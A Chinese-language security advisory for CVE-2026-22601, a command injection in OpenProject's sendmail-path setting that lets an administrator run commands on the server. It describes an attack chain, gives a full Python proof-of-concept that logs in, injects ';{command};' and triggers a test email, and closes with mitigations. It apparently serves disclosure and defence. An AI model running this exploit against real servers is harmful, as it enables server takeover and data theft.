CVE-2026-22601 OpenProject 管理员远程代码执行漏洞

漏洞信息

漏洞编号

CVE-2026-22601

漏洞类型

远程代码执行

CVSS评分

7.2 高危

攻击向量

网络 (AV:N)

认证要求

高权限 (PR:H)

用户交互

无需交互 (UI:N)

影响产品

OpenProject

漏洞概述

CVE-2026-22601是OpenProject项目管理系统中的一个高危安全漏洞，CVSS评分达到7.2分。该漏洞影响OpenProject 16.6.1及以下所有版本。漏洞的根本原因在于系统允许具有管理员权限的用户自定义配置sendmail二进制路径，而这一配置选项在发送测试邮件时会被直接调用。攻击者只需拥有一个注册的管理员账户，即可利用此漏洞在服务器上执行任意系统命令，从而完全控制服务器。成功利用此漏洞可能导致敏感数据泄露、系统文件被篡改、恶意软件部署，甚至进一步横向移动攻击内网中的其他系统。由于该漏洞需要管理员权限才能利用，因此降低了被低权限用户滥用的风险，但一旦管理员账户被攻破，后果将极为严重。此漏洞已在OpenProject 16.6.2版本中得到修复，强烈建议所有用户立即升级到最新版本。

技术细节

该漏洞属于命令注入漏洞（Command Injection），存在于OpenProject的邮件配置功能模块中。技术原理如下：1. 系统提供了管理员配置邮件发送方式的功能，其中包括自定义sendmail二进制路径的选项；2. 当管理员点击发送测试邮件时，系统会使用配置好的sendmail路径执行邮件发送操作；3. 由于该路径参数未经过充分的安全校验，攻击者可以在路径中注入恶意命令；4. 系统通过shell执行sendmail命令时，注入的命令将被一同执行。攻击者可以利用反弹shell技术获取服务器的交互式命令执行权限。例如，将sendmail路径配置为包含恶意payload的字符串，当测试邮件功能被触发时，payload将在服务器端执行。漏洞的关键代码位置在邮件配置处理和测试邮件发送逻辑中，攻击者需要具备管理员权限才能访问相关配置页面并修改sendmail路径参数。

攻击链分析

STEP 1

1

攻击者获取OpenProject管理员账户（通过钓鱼、凭证泄露或社会工程学手段）

STEP 2

2

使用管理员账户登录OpenProject系统，访问邮件配置页面

STEP 3

3

在sendmail路径配置项中注入恶意命令，如反弹shell命令或任意系统命令

STEP 4

4

触发测试邮件发送功能，系统将使用注入的路径执行命令

STEP 5

5

恶意命令在服务器端以Web服务进程权限执行，攻击者获得服务器控制权

STEP 6

6

攻击者可以进一步横向移动、窃取数据或部署持久化后门

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

#!/usr/bin/env python3 """ CVE-2026-22601 PoC - OpenProject Remote Code Execution Description: OpenProject <= 16.6.1 allows administrators to execute arbitrary commands via sendmail binary path configuration. Usage: python3 CVE-2026-22601_poc.py -t TARGET -u USERNAME -p PASSWORD """ import argparse import requests import json import re def login(target, username, password): """Authenticate to OpenProject and get session cookies""" session = requests.Session() login_url = f"{target}/login" # Get CSRF token response = session.get(login_url) csrf_token = re.search(r'name="_csrf_token" value="([^"]+)"', response.text) if not csrf_token: print("[-] Failed to get CSRF token") return None # Login request login_data = { "username": username, "password": password, "_csrf_token": csrf_token.group(1), "login": "" } response = session.post(login_url, data=login_data, allow_redirects=False) if response.status_code in [302, 303]: print(f"[+] Login successful: {username}") return session else: print("[-] Login failed") return None def exploit(session, target, command): """Exploit CVE-2026-22601 by configuring malicious sendmail path""" settings_url = f"{target}/settings/plugin/openproject" # Get current settings page response = session.get(settings_url) csrf_token = re.search(r'name="_csrf_token" content="([^"]+)"', response.text) if not csrf_token: csrf_token = re.search(r'meta content="([^"]+)" name="csrf-token"', response.text) # Prepare malicious payload # Example:反弹shell command malicious_path = f";{command};" # Update email settings with malicious sendmail path settings_data = { "settings[sendmail_location]": malicious_path, "_csrf_token": csrf_token.group(1) if csrf_token else "" } response = session.patch(settings_url, data=settings_data) # Trigger test email to execute command test_email_url = f"{target}/settings/plugin/openproject/test_mails" test_data = { "sender_name": "Test", "sender_email": "[email protected]", "_csrf_token": csrf_token.group(1) if csrf_token else "" } response = session.post(test_email_url, data=test_data) print(f"[*] Payload sent, command executed: {command}") print(f"[*] Response status: {response.status_code}") def main(): parser = argparse.ArgumentParser(description='CVE-2026-22601 PoC') parser.add_argument('-t', '--target', required=True, help='Target URL (e.g., http://target.com)') parser.add_argument('-u', '--username', required=True, help='Admin username') parser.add_argument('-p', '--password', required=True, help='Admin password') parser.add_argument('-c', '--command', default='id', help='Command to execute') args = parser.parse_args() # Login session = login(args.target, args.username, args.password) if session: # Exploit exploit(session, args.target, args.command) if __name__ == "__main__": main()

影响范围

OpenProject <= 16.6.1

防御指南

临时缓解措施

如果无法立即升级，可采取以下临时缓解措施：1) 审查所有管理员账户，禁用不必要的特权账户；2) 限制邮件配置页面的访问IP范围；3) 启用OpenProject的审计日志功能，监控邮件配置变更；4) 在网络层面对邮件服务器相关端口进行隔离；5) 考虑暂时禁用测试邮件功能。但最根本的解决方案仍是尽快升级到官方发布的修复版本16.6.2。